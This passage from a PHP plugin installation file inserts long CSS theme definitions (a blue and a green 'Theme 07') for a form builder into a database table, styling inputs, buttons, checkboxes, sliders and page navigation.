height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/next.png) no-repeat right #0072A2;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border-right: 1px solid #CECECE;\r\n} \r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #0072A2;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #267EA9;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #267EA9;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F1F1F1;\r\nborder: 1px solid transparent;\r\ncolor: #696969;\r\n	outline: none;\r\n}\r\ninput[type="text"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type="password"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #0072A2;\r\n	background-color: #ECEBEB;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #0072A2;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 18px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #006C9A; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #0072A2 0%, #00709F 39%, #006A97 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #0072A2), color-stop(39%, #00709F), color-stop(100%, #006A97)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #0072A2 0%, #00709F 39%, #006A97 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #0072A2 0%, #00709F 39%, #006A97 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #0072A2 0%, #00709F 39%, #006A97 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #0072A2 0%, #00709F 39%, #006A97 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #EBEAEA;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation:after {\r\n	content: " ";\r\n	display: block;\r\n	height: 9px;\r\n	background: url([SITE_ROOT]/images/07/0.png) no-repeat;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -9px;\r\n}\r\n.wdform_percentage_text {\r\n	margin-right:9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 07 green\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #00A25B;\r\nmargin-bottom: 10px;\r\ncolor: #00A25B;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #A4A4A4;\r\n	border: 1px solid #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F1F1F1 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #696969;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F1F1F1;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/07/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/next.png) no-repeat right #00A25B;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/07/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border-right: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #00A25B;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #00A25B;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #00A25B;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F1F1F1;\r\nborder: 1px solid transparent;\r\ncolor: #696969;\r\n	outline: none;\r\n}\r\ninput[type="text"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type="password"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #00A25B;\r\n	background-color: #ECEBEB;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #00A25B;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 18px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #00A15B ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #00A25B 0%, #00A15A 39%, #00A15B 